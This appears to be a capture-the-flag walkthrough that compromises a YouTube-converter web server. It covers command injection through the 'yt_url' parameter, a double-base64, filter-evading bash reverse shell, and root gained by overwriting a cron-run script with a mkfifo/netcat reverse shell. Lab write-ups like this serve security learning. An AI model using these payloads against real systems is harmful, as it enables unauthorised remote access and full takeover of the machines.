sudo nmap -p- -sS -sV

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelP

Port 80 lands us on a Youtube video conversion page.

Running feroxbuster against the target website produces only a few results. Of which only the /admin directory is interesting. The /admin directory uses a HTTP-basic-form and I was unable to crack using rockyou.txt with common user names such as 'admin'.

Running a generic query does not produces anything interesting.

Running the search query through Burpsuite gives us the parameter 'yt_url'.

Referring against this link we can try various command injection techniques for valid parameters.

As per the link trying the following gives us a command injection result:


Knowing we can inject commands we can attempt a reverse shell by running the command below in a terminal on our attacking machine then taking the output and using it in our command injection

echo "echo $(echo 'bash -i >& /dev/tcp/ 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'

Then paste the output into Burpsuite:

Once sent we should receive a reverse shell on the netcat listener.

After looking about the machine and running enumeration scripts I was unable to identify any points of escalation. I then decided to run pspy64 to see if anything is being executed on a regular basis.

After transferring and running we get the following results:

Frequently the following is being run:

/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/

From here I echo'd out the contents of and replaced the contents with a netcat reverse shell.

echo  >
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f' >

Then set up a listener on port 4444 waited a few seconds and received a shell as root.

Last updated